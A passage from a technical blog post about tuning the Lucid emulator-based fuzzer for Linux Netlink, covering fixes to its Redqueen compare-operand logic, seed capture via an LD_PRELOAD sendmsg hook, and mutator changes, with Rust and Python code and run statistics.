<p>Redqueen’s key observation is that these types of checks often boil down to <code class="language-plaintext highlighter-rouge">cmp</code> instructions on x86 architectures, where two “operand values”, the left operand and the right operand, are compared with one another. From the fuzzer’s point of view, it is often impossible to tell which side is derived from the input and which side is derived from the program. So Redqueen searches the input for both operands; if it finds one of them, it replaces it in the input with the other operand value, hoping that we can now pass the check.</p>
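<p>A minimal sketch of that search-and-replace step, assuming 4-byte operands stored little-endian in the input. The helper names are hypothetical and this is a simplification of what the paper (and Lucid) actually do:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// Illustrative sketch only; not the paper's or Lucid's implementation.

/// Return every offset where `needle` occurs in `haystack`.
fn find_all(haystack: &amp;[u8], needle: &amp;[u8]) -&gt; Vec&lt;usize&gt; {
    if needle.is_empty() || needle.len() &gt; haystack.len() {
        return Vec::new();
    }
    haystack
        .windows(needle.len())
        .enumerate()
        .filter(|(_, w)| *w == needle)
        .map(|(i, _)| i)
        .collect()
}

/// For one observed comparison (lhs, rhs), build candidate inputs in which
/// an occurrence of one operand is replaced by the other. Both directions
/// are tried because we cannot tell which side came from the input.
pub fn cmp_candidates(input: &amp;[u8], lhs: u32, rhs: u32) -&gt; Vec&lt;Vec&lt;u8&gt;&gt; {
    let mut out = Vec::new();
    if lhs == rhs {
        // The comparison already passes; nothing to patch
        return out;
    }
    for (find, replace) in [(lhs, rhs), (rhs, lhs)] {
        let find = find.to_le_bytes();
        let replace = replace.to_le_bytes();
        for off in find_all(input, &amp;find) {
            let mut patched = input.to_vec();
            patched[off..off + 4].copy_from_slice(&amp;replace);
            out.push(patched);
        }
    }
    out
}
</code></pre></div></div>
<p>Every candidate returned here costs one more execution of the target to test.</p>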

<p>This would be extremely expensive normally during fuzzing, so to minimize overhead, Redqueen only performs this type of mutation on inputs that recently found new code coverage, this way the overhead is mostly a one-time cost and the overhead asymptotes to zero as the campaign progresses and new coverage becomes ever more rare.</p>

<p>This isn’t really a fair overview of the technique, but this conveys the gist. Please read the linked paper if you’re interested, it’s probably my favorite fuzzing paper to date.</p>

<p>We can implement this in our fuzzer because we have access to all compare instructions of all sizes for free in Bochs. When I find a new input, I toggle a field in the execution context data structure shared between Lucid and Bochs called the “CPU mode”, which tells Bochs what kind of emulation we’re doing. I then replay the input with the CPU mode set to <code class="language-plaintext highlighter-rouge">Cmplog</code>. This causes Bochs to report all of the operand values that it sees in the compare instructions, the instruction pointer value, and the size of the operands back to Lucid. Lucid can now create a database of values and try the Redqueen strategy for more coverage.</p>

<p>However, we ran into a huge problem, check out the statistics from the Redqueen enabled run:</p>
<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[lucid stats (start time: 2025-09-21 20:13:29)]
globals: uptime: 0d 14h 18m 23s | fuzzers: 8 | crashes: 0 | timeouts: 0
perf: iters: 369.79K | iters/s: 0.10 | iters/s/f: 0.01
cpu: target: 9.1% | reset: 0.0% | mutator: 0.0% | coverage: 0.0% | redqueen: 90.9% | misc: 0.0%
coverage: edges: 15829 | last find: 0h 17m 16s | map: 24.15%
snapshot: dirty pages: 7224 | dirty / total: 0.00128% | reset memcpys: 532
corpus: inputs: 32272 | corpus size (MB): 430.671 | max input: 0x8088
</code></pre></div></div>

<p>We were basically only doing Redqueen analysis (about 91% of CPU time) for the entire 14-hour fuzzing run, during which we averaged roughly 7 global iterations per second. This means that Redqueen had become a prohibitive bottleneck. We can also tell from the number of edges discovered that it didn’t help much, at least not initially. Some of this general pattern is to be expected:</p>
<ol>
  <li>Early in the campaign we find new coverage often</li>
  <li>Inputs are being sent to Redqueen often</li>
</ol>

<p>That is not surprising. However, I found that there were <em>several</em> problems with the Redqueen implementation itself.</p>

<h3 id="issue-1">Issue-1</h3>
<p>The Redqueen paper also pointed out that sometimes input data is <em>transformed or encoded</em> before being compared. For instance, maybe input data is originally a <code class="language-plaintext highlighter-rouge">u64</code> value but is cast to an <code class="language-plaintext highlighter-rouge">i32</code> before being compared. If that were the case, we would never find the compare operand value for the <code class="language-plaintext highlighter-rouge">i32</code> in our input, so we instead need to precompute a handful of common encodings and search for those. If we find an encoded form of a compare operand, we then replace it with the same encoding of the other operand value. This makes sense. However, I had a logic bug in my implementation that attempted to solve the compare by generating <em>all possible encodings</em> for the found operand value instead of the single matching encoding. This increased the number of input patches to try by 15-20x.</p>

<p>The Redqueen paper also found that substituting the operand value adjusted by -1 or +1 helps in passing less-than/greater-than comparisons. Remember, we only hook compare operations that might set CPU flags, and we don’t know what the program does with that information afterwards, so this helps us get past those checks as well. In my erroneous implementation, that tripled the number of patches we attempted, which was already 15-20x too many, so we were at around 45-60x too many patches to test.</p>

<p>So here’s a concrete example of what I was doing:</p>
<ol>
  <li>I receive a report of an operand value pair 0x1337 and 0xdead. These are 2 byte values.</li>
  <li>I was pre-computing every possible encoding for both values in the pair (this part is correct)</li>
  <li>If I found an encoding variant of 0x1337, say zero-extended to a <code class="language-plaintext highlighter-rouge">u32</code>, so 0x00001337 in the input, what I should be doing is applying that same encoding scheme to its partner value and creating 0x0000dead. Then I would replace 0x00001337 in the input with 0x0000dead.</li>
  <li>Instead, I was replacing 0x00001337 with <em>every possible similarly sized encoding of 0xdead</em></li>
</ol>
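<p>The intended behavior from the steps above can be sketched as follows. This is a simplified illustration with only four encodings of a 2-byte operand and hypothetical helper names; the real encoding set is larger and the ±1 variants are omitted.</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// Illustrative sketch only; the encoding list is deliberately tiny.

/// A few encodings of a 16-bit operand, always in the same order so that
/// index N of one operand pairs with index N of its partner.
fn encodings(v: u16) -&gt; Vec&lt;Vec&lt;u8&gt;&gt; {
    vec![
        v.to_le_bytes().to_vec(),          // little-endian u16
        v.to_be_bytes().to_vec(),          // big-endian u16
        (v as u32).to_le_bytes().to_vec(), // zero-extended u32, little-endian
        (v as u32).to_be_bytes().to_vec(), // zero-extended u32, big-endian
    ]
}

/// Search for each encoding of `found` and replace a match with the *same*
/// encoding of `partner`, never with every encoding of `partner`.
pub fn matched_patches(input: &amp;[u8], found: u16, partner: u16) -&gt; Vec&lt;Vec&lt;u8&gt;&gt; {
    let mut out = Vec::new();
    for (pat, rep) in encodings(found).into_iter().zip(encodings(partner)) {
        for (off, win) in input.windows(pat.len()).enumerate() {
            if win == pat.as_slice() {
                let mut patched = input.to_vec();
                patched[off..off + rep.len()].copy_from_slice(&amp;rep);
                out.push(patched);
            }
        }
    }
    // Different encodings can yield the same patched input; test it once
    out.sort();
    out.dedup();
    out
}
</code></pre></div></div>
<p>With the operand pair from the example, an input containing 0x1337 in big-endian form yields exactly one candidate, the big-endian form of 0xdead, rather than one candidate per encoding.</p>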

<h3 id="issue-2">Issue-2</h3>
<p>But wait, it gets worse! I was also not deduplicating operands based on the <code class="language-plaintext highlighter-rouge">RIP</code> value of the <code class="language-plaintext highlighter-rouge">cmp</code> instruction. Normally, this can be ok because it allows you to potentially pass more dynamic comparisons where both operand values are ever-changing based on your input, a checksum for example. However, given our throughput issues, and since we just want to do the bare minimum here and defeat classic magic number comparisons, we can significantly whittle down the number of input patches to try by ignoring operands from <code class="language-plaintext highlighter-rouge">RIP</code> values we’ve already seen. We will rely on human-in-the-loop intervention if we ever need to defeat checksum-type comparisons.</p>

<h3 id="issue-3">Issue-3</h3>
<p>To cap everything off, I was <em>creating all of the patched inputs</em> before trying them all serially. So I would pre-compute the patched inputs and stuff them in an input queue that Lucid would then prioritize over normal mutations. This led to my fuzzers being killed with <code class="language-plaintext highlighter-rouge">SIGKILL</code> by the kernel as they started holding too many inputs in memory overnight. That is actually what ended this stage of experimentation. So this fuzzing stage was an abject disaster, but we ended up making a ton of improvements in the next iteration.</p>

<h3 id="issue-4">Issue-4</h3>
<p><em>Minor Note</em>: The Redqueen paper also employed a technique it called “colorization”, wherein as much of the input as possible is overwritten (“colored”) with random bytes without changing the input’s execution path. It starts with the largest amount of randomization possible and then, using something like binary search, keeps shrinking the portions of the input being colorized until the execution trace matches the original. The purpose of this is to make finding operand values in the input easier. Instead of an input being full of 0x0 values, for instance, it now contains random data, so when you capture the compare operand values, that random data is easier to spot in the input and you don’t run the risk of duplicating candidate insertions. This is actually genius. Lucid has this feature too, but I found that I was spending <strong>dozens of seconds</strong> colorizing large inputs, simply because we are so slow. I decided that the juice wasn’t worth the squeeze, so in order to use colorization now, you have to pass a command line flag to opt into it.</p>
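<p>For a sense of why colorization costs so many executions, here is a rough sketch of the range-splitting loop. It is not the paper’s exact algorithm or Lucid’s code: <code class="language-plaintext highlighter-rouge">trace</code> is a hypothetical stand-in for “run the target and hash its execution path”, and <code class="language-plaintext highlighter-rouge">rand_byte</code> is any source of random bytes.</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// Illustrative sketch only; `trace` stands in for one full target execution.

/// Randomize as much of `input` as possible while `trace` stays unchanged.
pub fn colorize(
    input: &amp;[u8],
    mut rand_byte: impl FnMut() -&gt; u8,
    trace: impl Fn(&amp;[u8]) -&gt; u64,
) -&gt; Vec&lt;u8&gt; {
    let original = trace(input);
    let mut colored = input.to_vec();
    // Ranges (start, end) still to try, beginning with the whole input
    let mut ranges = vec![(0usize, input.len())];
    while let Some((start, end)) = ranges.pop() {
        if start &gt;= end {
            continue;
        }
        let backup = colored[start..end].to_vec();
        for b in &amp;mut colored[start..end] {
            *b = rand_byte();
        }
        // Each check below is one more execution of the target
        if trace(&amp;colored) != original {
            // Randomizing this range changed the path: undo and split it
            colored[start..end].copy_from_slice(&amp;backup);
            if end - start &gt; 1 {
                let mid = start + (end - start) / 2;
                ranges.push((start, mid));
                ranges.push((mid, end));
            }
        }
    }
    colored
}
</code></pre></div></div>
<p>Even in this toy form, the number of <code class="language-plaintext highlighter-rouge">trace</code> calls grows with the input size and with how many bytes actually influence the path, which adds up quickly at a few executions per second.</p>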

<h2 id="stage-4-fixing-redqueen">Stage 4: Fixing Redqueen</h2>
<p>Besides fixing the aforementioned logical errors, I added some new logic to the implementation. First, I started deduping operand values collected by the <code class="language-plaintext highlighter-rouge">RIP</code> value. So we no longer are doing Redqueen analysis for the same <code class="language-plaintext highlighter-rouge">RIP</code> compare operands more than once.</p>

<p>Additionally, I stopped collecting compare operands for values that weren’t at least 4 bytes in size. I figure that most mutators should be able to randomly pass 1 and 2-byte comparisons by sheer luck.</p>

<p>I also capped the number of Redqueen inputs you can put in the fuzzer’s test queue at 500. In my testing, we never even really approached 500 inputs in the test queue with the fixed encoding search, <code class="language-plaintext highlighter-rouge">RIP</code> deduplication, and the removal of compares smaller than 32 bits. Previously, in the broken implementation, some fuzzers were carrying up to 1 million inputs to test!</p>
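<p>Put together, the three restrictions amount to a small filter in front of the Redqueen queue. The sketch below is a hedged illustration: the <code class="language-plaintext highlighter-rouge">CmpRecord</code> layout, type names, and function names are hypothetical and not Lucid’s real data structures.</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// Illustrative sketch only; types and names are hypothetical.
use std::collections::{HashSet, VecDeque};

/// One compare observation reported by the emulator.
pub struct CmpRecord {
    pub rip: u64,
    pub size: u8, // operand size in bytes
    pub lhs: u64,
    pub rhs: u64,
}

/// Ignore compares narrower than 4 bytes (32 bits).
pub const MIN_OPERAND_BYTES: u8 = 4;
/// Maximum number of patched inputs waiting to be tested.
pub const MAX_QUEUE: usize = 500;

#[derive(Default)]
pub struct CmpFilter {
    seen_rips: HashSet&lt;u64&gt;,
}

impl CmpFilter {
    /// True if this record should be analyzed: wide enough and from a
    /// compare instruction address we have not processed before.
    pub fn accept(&amp;mut self, rec: &amp;CmpRecord) -&gt; bool {
        if rec.size &lt; MIN_OPERAND_BYTES {
            return false;
        }
        // `insert` returns false when the RIP was already present
        self.seen_rips.insert(rec.rip)
    }
}

/// Queue a patched input unless the queue is already at its cap.
pub fn enqueue(queue: &amp;mut VecDeque&lt;Vec&lt;u8&gt;&gt;, input: Vec&lt;u8&gt;) -&gt; bool {
    if queue.len() &gt;= MAX_QUEUE {
        return false;
    }
    queue.push_back(input);
    true
}
</code></pre></div></div>
<p>The cap is a safety net rather than the main fix: with the filter in place, the queue should rarely get anywhere near full.</p>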

<p>Fixing the bugs and adding these new restrictions to the Redqueen code helped immensely and we achieved the following fuzzing run:</p>
<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[lucid stats (start time: 2025-09-22 11:47:27)]
globals: uptime: 0d 5h 49m 26s | fuzzers: 8 | crashes: 0 | timeouts: 0
perf: iters: 738.01K | iters/s: 34.30 | iters/s/f: 4.29
cpu: target: 98.1% | reset: 1.8% | mutator: 0.0% | coverage: 0.1% | redqueen: 0.0% | misc: 0.0%
coverage: edges: 16100 | last find: 0h 1m 10s | map: 24.57%
snapshot: dirty pages: 7290 | dirty / total: 0.00129% | reset memcpys: 557
corpus: inputs: 70366 | corpus size (MB): 877.591 | max input: 0x8088
</code></pre></div></div>

<p>As you can see, we doubled the iteration count in less than half of the wall-clock time. We also didn’t use so much memory that the fuzzers got killed, so that’s good. Now that Redqueen is fixed, we can move on.</p>

<h3 id="redqueen-success-example">Redqueen Success Example</h3>
<p>Redqueen proved to be extremely helpful at finding new edges once we got away from the first 30 minutes or so of fuzzing. This was an awesome example I have to share:</p>
<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[lucid stats (start time: 2025-09-24 15:23:35)]
globals: uptime: 0d 0h 56m 54s | fuzzers: 8 | crashes: 0 | timeouts: 0
perf: iters: 96.08K | iters/s: 18.05 | iters/s/f: 2.26
cpu: target: 97.7% | reset: 1.4% | mutator: 0.0% | coverage: 0.0% | redqueen: 0.7% | misc: 0.0%
coverage: edges: 19920 | last find: 0h 0m 56s | map: 30.40%
snapshot: dirty pages: 8122 | dirty / total: 0.00144% | reset memcpys: 982
corpus: inputs: 2581 | corpus size (MB): 8.827 | max input: 0x10088
fuzzer-2: Fuzzing increased edge count 19475 -&gt; 19476 (+1)
fuzzer-1: Fuzzing increased edge count 19505 -&gt; 19507 (+2)
fuzzer-7: Fuzzing increased edge count 19194 -&gt; 19196 (+2)
fuzzer-4: Fuzzing increased edge count 19365 -&gt; 19370 (+5)
fuzzer-4: Redqueen increased edge count 19370 -&gt; 19721 (+351)
fuzzer-4: Redqueen increased edge count 19721 -&gt; 19784 (+63)
fuzzer-4: Redqueen increased edge count 19784 -&gt; 20925 (+1141)
</code></pre></div></div>
<p><code class="language-plaintext highlighter-rouge">fuzzer-4</code> starts off well behind the record edge count (<code class="language-plaintext highlighter-rouge">19920</code>) at <code class="language-plaintext highlighter-rouge">19365</code> edges discovered. It uses normal fuzzing mutation strategies and increases its edge count to <code class="language-plaintext highlighter-rouge">19370</code>. Then, that new-edge-finding input is sent to Redqueen for processing and Redqueen <em>dramatically</em> increases the fuzzer’s edge discovery progress. It rapidly discovers <code class="language-plaintext highlighter-rouge">1555</code> new edges which is an 8% increase over what it had just reached with fuzzing.</p>

<h2 id="stage-5-adding-seeds-mutator-tweaks-misc">Stage 5: Adding Seeds, Mutator Tweaks, Misc.</h2>
<h3 id="seeds">Seeds</h3>
<p>In this stage, the focus was mainly on creating seed inputs that would start the fuzzing campaign off with a lot of coverage. Up to this point, the most edges we ever discovered for this fuzzing target/harness was around 17.5k, which we saw with our improved mutator but without compare coverage and running for around 14 hours. Now, that doesn’t mean that compare coverage is a hindrance to edge discovery, it just means that early on it’s not as effective at finding new edges as the normal fuzzing strategies were. With seeds, I was hoping to see a dramatic increase in the number of edges discovered because we’d be spoon feeding the mutator some of the complex inputs it needs to generate.</p>

<p>To create seed inputs, I actually just created an <code class="language-plaintext highlighter-rouge">LD_PRELOAD</code> shared object that hijacked the <code class="language-plaintext highlighter-rouge">sendmsg</code> libc invocation found in several command line utilities that normally come packaged in Ubuntu to interact with these subsystems. I’m talking about <code class="language-plaintext highlighter-rouge">tc</code> for setting up qdiscs or the network scheduler for <code class="language-plaintext highlighter-rouge">NETLINK_ROUTE</code>, or <code class="language-plaintext highlighter-rouge">nft</code> to interact with <code class="language-plaintext highlighter-rouge">nf_tables</code> for <code class="language-plaintext highlighter-rouge">NETLINK_NETFILTER</code>, etc. I simply hook the <code class="language-plaintext highlighter-rouge">sendmsg</code> libc function and have it dump the message contents to the terminal in hex. Here is an example:</p>
<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@luciddev:/home/h0mbre/netlink_fuzzing# LD_PRELOAD=./hexdump_netlink.so tc qdisc add dev dummy0 root pfifo_fast
echo "3400000024000506fa2cd46800000000000000000700000000000000ffffffff000000000f000100706669666f5f666173740000"
</code></pre></div></div>
<p>Then I just pasted that <code class="language-plaintext highlighter-rouge">echo</code> string into the terminal and wrote the hex to a file and then wrapped those bytes in our fuzzing input data structure using Python:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env python3
</span><span class="kn">import</span> <span class="nn">sys</span>

<span class="c1"># lf_protocols = {0: ROUTE, 1: XFRM, 2: NETFILTER, 3: CRYPTO}
</span>
<span class="k">def</span> <span class="nf">build_seed</span><span class="p">(</span><span class="n">hex_string</span><span class="p">:</span> <span class="nb">str</span><span class="p">,</span> <span class="n">protocol</span><span class="p">:</span> <span class="nb">int</span><span class="p">,</span> <span class="n">out_file</span><span class="p">:</span> <span class="nb">str</span><span class="p">):</span>
    <span class="c1"># Parse hex string into bytes
</span>    <span class="n">payload</span> <span class="o">=</span> <span class="nb">bytes</span><span class="p">.</span><span class="n">fromhex</span><span class="p">(</span><span class="n">hex_string</span><span class="p">)</span>
    <span class="n">payload_len</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span>

    <span class="c1"># Lengths
</span>    <span class="n">lf_msg_hdr_len</span> <span class="o">=</span> <span class="mi">8</span>
    <span class="n">lf_input_hdr_len</span> <span class="o">=</span> <span class="mi">8</span>
    <span class="n">total_len</span> <span class="o">=</span> <span class="n">payload_len</span> <span class="o">+</span> <span class="n">lf_msg_hdr_len</span> <span class="o">+</span> <span class="n">lf_input_hdr_len</span>
    <span class="n">num_msgs</span> <span class="o">=</span> <span class="mi">1</span>

    <span class="c1"># Build buffer
</span>    <span class="n">buf</span>  <span class="o">=</span> <span class="n">total_len</span><span class="p">.</span><span class="n">to_bytes</span><span class="p">(</span><span class="mi">4</span><span class="p">,</span> <span class="s">"little"</span><span class="p">)</span>
    <span class="n">buf</span> <span class="o">+=</span> <span class="n">num_msgs</span><span class="p">.</span><span class="n">to_bytes</span><span class="p">(</span><span class="mi">4</span><span class="p">,</span> <span class="s">"little"</span><span class="p">)</span>
    <span class="n">buf</span> <span class="o">+=</span> <span class="n">protocol</span><span class="p">.</span><span class="n">to_bytes</span><span class="p">(</span><span class="mi">4</span><span class="p">,</span> <span class="s">"little"</span><span class="p">)</span>
    <span class="n">buf</span> <span class="o">+=</span> <span class="n">payload_len</span><span class="p">.</span><span class="n">to_bytes</span><span class="p">(</span><span class="mi">4</span><span class="p">,</span> <span class="s">"little"</span><span class="p">)</span>
    <span class="n">buf</span> <span class="o">+=</span> <span class="n">payload</span>

    <span class="c1"># Write to disk
</span>    <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">out_file</span><span class="p">,</span> <span class="s">"wb"</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
        <span class="n">f</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="n">buf</span><span class="p">)</span>

    <span class="k">print</span><span class="p">(</span><span class="sa">f</span><span class="s">"Wrote </span><span class="si">{</span><span class="n">out_file</span><span class="si">}</span><span class="s"> (</span><span class="si">{</span><span class="nb">len</span><span class="p">(</span><span class="n">buf</span><span class="p">)</span><span class="si">}</span><span class="s"> bytes, payload=</span><span class="si">{</span><span class="n">payload_len</span><span class="si">}</span><span class="s"> bytes)"</span><span class="p">)</span>


<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">"__main__"</span><span class="p">:</span>
    <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">4</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="sa">f</span><span class="s">"Usage: </span><span class="si">{</span><span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="si">}</span><span class="s"> &lt;hex_string_file&gt; &lt;protocol_idx&gt; &lt;out_file&gt;"</span><span class="p">)</span>
        <span class="n">sys</span><span class="p">.</span><span class="nb">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>

    <span class="n">hex_file</span><span class="p">,</span> <span class="n">protocol_str</span><span class="p">,</span> <span class="n">out_file</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">:]</span>
    <span class="n">protocol</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">protocol_str</span><span class="p">)</span>

    <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">hex_file</span><span class="p">,</span> <span class="s">"r"</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
        <span class="c1"># join lines, strip whitespace/newlines
</span>        <span class="n">hex_string</span> <span class="o">=</span> <span class="s">""</span><span class="p">.</span><span class="n">join</span><span class="p">(</span><span class="n">line</span><span class="p">.</span><span class="n">strip</span><span class="p">()</span> <span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">f</span><span class="p">)</span>

    <span class="n">build_seed</span><span class="p">(</span><span class="n">hex_string</span><span class="p">,</span> <span class="n">protocol</span><span class="p">,</span> <span class="n">out_file</span><span class="p">)</span>
</code></pre></div></div>
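
<p>A quick way to sanity-check a captured message before wrapping it is to decode its Netlink header. The sketch below is not part of Lucid; it assumes the standard 16-byte <code class="language-plaintext highlighter-rouge">nlmsghdr</code> layout (length, type, flags, sequence number, port ID, little-endian on x86-64) and reuses the hex string from the <code class="language-plaintext highlighter-rouge">tc</code> example above. The <code class="language-plaintext highlighter-rouge">parse_nlmsghdr</code> helper is a hypothetical name chosen for illustration.</p>

```python
import struct

# Hex dump captured from the `tc qdisc add ... pfifo_fast` example above,
# split into header / tcmsg / attribute purely for readability.
CAPTURED = (
    "3400000024000506fa2cd46800000000"
    "000000000700000000000000ffffffff00000000"
    "0f000100706669666f5f666173740000"
)

# struct nlmsghdr: nlmsg_len (u32), nlmsg_type (u16), nlmsg_flags (u16),
# nlmsg_seq (u32), nlmsg_pid (u32)
NLMSG_HDR = struct.Struct("<IHHII")


def parse_nlmsghdr(raw: bytes) -> dict:
    """Decode the 16-byte Netlink header at the start of `raw` (hypothetical helper)."""
    if len(raw) < NLMSG_HDR.size:
        raise ValueError("buffer is shorter than a Netlink header")
    length, msg_type, flags, seq, pid = NLMSG_HDR.unpack_from(raw)
    return {"len": length, "type": msg_type, "flags": flags, "seq": seq, "pid": pid}


payload = bytes.fromhex(CAPTURED)
hdr = parse_nlmsghdr(payload)

# A well-formed single-message capture should describe its own length.
if hdr["len"] != len(payload):
    raise SystemExit(f"length mismatch: header says {hdr['len']}, got {len(payload)}")
print(f"len={hdr['len']} type={hdr['type']} flags={hdr['flags']:#x}")
```

<p>For the <code class="language-plaintext highlighter-rouge">pfifo_fast</code> capture, the decoded length matches the size of the dump, and the message type is 36, which should correspond to <code class="language-plaintext highlighter-rouge">RTM_NEWQDISC</code> in <code class="language-plaintext highlighter-rouge">linux/rtnetlink.h</code>.</p>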

<p>I think all in all I created ~30 seeds this way. I seeded every target protocol except <code class="language-plaintext highlighter-rouge">NETLINK_CRYPTO</code> with at least one seed. The vast majority of the seeds became single message inputs and were simple in nature. For <code class="language-plaintext highlighter-rouge">nf_tables</code> specifically, I did create one input that was a series of messages to do stateful things like:
create a table, then create a set, then create an object, etc.</p>

<p>When fuzzing with seeds, our coverage increased dramatically. The seeds alone found over 17k edges. The lesson learned is nothing new, but having good seeds <strong>dramatically</strong> enhances your fuzzing efficiency.</p>

<h3 id="mutator-tweaks">Mutator Tweaks</h3>
<p>Since we’re so limited on throughput, I really wanted to make sure the inputs we were creating weren’t wasting cycles. On average we were spending over 98% of our CPU time executing the target and spending roughly 2% of the time doing snapshot resets. At that much target time, it’s clear where the bottleneck is and it’s not on anything the fuzzer itself is doing.</p>

<p>This kind of frees us up to do more things in the fuzzer since it won’t slow the process down at all really. So what I decided to do was start hashing every input that the mutator created and comparing it to a database of the last <code class="language-plaintext highlighter-rouge">n</code> inputs, which I set arbitrarily at <code class="language-plaintext highlighter-rouge">500_000</code>. So now, barring hash collisions, every input we create is guaranteed to not be a repeat of the last 500k inputs. This helps a little when it comes to throughput because we’re not wasting precious CPU time re-running an often seen input.</p>
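
<p>The idea of remembering only the last <code class="language-plaintext highlighter-rouge">n</code> inputs can be sketched in a few lines. This is an illustration in Python rather than Lucid’s actual Rust code; the class name, the choice of BLAKE2b, and the 8-byte digest size are all assumptions made for the example.</p>

```python
import hashlib
from collections import deque


class RecentInputFilter:
    """Remembers digests of the last `capacity` inputs and flags repeats.

    Hypothetical helper: Lucid's real data structure and hash are not shown
    in the post, so everything here is an assumption.
    """

    def __init__(self, capacity: int = 500_000):
        self.capacity = capacity
        self.order = deque()  # digests in arrival order, oldest first
        self.seen = set()     # same digests, for O(1) membership checks

    def is_new(self, data: bytes) -> bool:
        """Return True (and remember the input) if it was not seen recently."""
        digest = hashlib.blake2b(data, digest_size=8).digest()
        if digest in self.seen:
            return False
        if len(self.order) >= self.capacity:
            # Forget the oldest input so memory use stays bounded.
            self.seen.discard(self.order.popleft())
        self.order.append(digest)
        self.seen.add(digest)
        return True
```

<p>A mutator built around this would keep re-mutating until <code class="language-plaintext highlighter-rouge">is_new</code> returns true. Memory stays bounded at <code class="language-plaintext highlighter-rouge">capacity</code> digests, at the cost of occasionally re-running an input that has aged out of the window.</p>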

<p>I also made sure that when the mutator was choosing mutation strategies that it would no longer accept a NOP operation in place of an applied mutation. As an example, say we get an input from the corpus to mutate and that input is already the maximum size. Previously, if we were to randomly select the <code class="language-plaintext highlighter-rouge">ByteInsert</code> mutation method for this input it would effectively perform a NOP and return without doing anything. This is potentially a waste of input creation cycles. So I changed the function signature of the mutation strategies to return a <code class="language-plaintext highlighter-rouge">bool</code> where <code class="language-plaintext highlighter-rouge">true</code> meant the mutation was successfully applied and <code class="language-plaintext highlighter-rouge">false</code> meant that it was not. This way we can make sure at least <em>some</em> mutation is applied to each and every input.</p>
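
<p>Here is a small sketch of that “mutations report success” pattern. It is Python rather than Lucid’s Rust, and the strategy names, the tiny <code class="language-plaintext highlighter-rouge">MAX_INPUT_SIZE</code>, and the try-each-strategy-once policy are assumptions for the example, not the fuzzer’s real behavior.</p>

```python
import random

MAX_INPUT_SIZE = 16  # hypothetical cap, kept tiny for demonstration


def byte_insert(buf: bytearray, rng: random.Random) -> bool:
    """Insert one random byte; report False if the input is already full."""
    if len(buf) >= MAX_INPUT_SIZE:
        return False
    buf.insert(rng.randrange(len(buf) + 1), rng.randrange(256))
    return True


def bit_flip(buf: bytearray, rng: random.Random) -> bool:
    """Flip one random bit; report False if there is nothing to flip."""
    if not buf:
        return False
    idx = rng.randrange(len(buf))
    buf[idx] ^= 1 << rng.randrange(8)
    return True


STRATEGIES = [byte_insert, bit_flip]


def mutate(buf: bytearray, rng: random.Random) -> bool:
    """Try strategies in random order until one actually changes the input."""
    for strategy in rng.sample(STRATEGIES, k=len(STRATEGIES)):
        if strategy(buf, rng):
            return True
    return False  # every strategy was a NOP for this input
```

<p>With a maximum-size input, <code class="language-plaintext highlighter-rouge">byte_insert</code> reports <code class="language-plaintext highlighter-rouge">False</code> and the loop falls through to a strategy that can still apply, instead of handing the target an unmodified input.</p>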

<p>Lastly, I keep a constant defined in the netlink mutator that is supposed to represent the percentage of inputs that we generate from scratch. It had previously been set at 5% and I lowered it to 1% now that we have seeds. I figured this would stop us from sending so much garbage while still allowing us to do something very random that still reaches some never before reached error handling paths. In addition to the rate change, I also refactored the random generation function to produce Netlink message-like inputs instead of random blobs of data of varying lengths. Now when we generate messages from scratch, they are at least shaped like valid Netlink messages.</p>
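
<p>To give a feel for what “shaped like a valid Netlink message” could mean, here is a rough sketch. Lucid’s real generator is not shown in this post, so the function names, the payload size limit, and the choice to randomize the type and flags fields are assumptions; the only fixed points are the 1% rate mentioned above and the standard 16-byte Netlink header with 4-byte alignment.</p>

```python
import random
import struct

GENERATE_PERCENT = 1   # share of inputs generated from scratch (from the post)
NLMSG_HDRLEN = 16      # size of struct nlmsghdr


def should_generate(rng: random.Random) -> bool:
    """Decide whether this input is generated from scratch instead of mutated."""
    return rng.randrange(100) < GENERATE_PERCENT


def generate_netlink_like(rng: random.Random, max_payload: int = 64) -> bytes:
    """Build one message with a self-consistent Netlink header and random body."""
    body_len = rng.randrange(max_payload + 1)
    body = bytes(rng.randrange(256) for _ in range(body_len))
    body += b"\x00" * (-len(body) % 4)  # pad to 4 bytes, like NLMSG_ALIGN
    header = struct.pack(
        "<IHHII",
        NLMSG_HDRLEN + len(body),  # nlmsg_len covers header plus payload
        rng.randrange(1 << 16),    # nlmsg_type: random here (assumption)
        rng.randrange(1 << 16),    # nlmsg_flags: random here (assumption)
        rng.getrandbits(32),       # nlmsg_seq
        0,                         # nlmsg_pid
    )
    return header + body
```

<p>Even this much structure means the kernel’s length checks on the header pass, so the random bytes at least reach the per-message handlers rather than being rejected up front.</p>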

<h3 id="hitcount-change">Hitcount Change</h3>
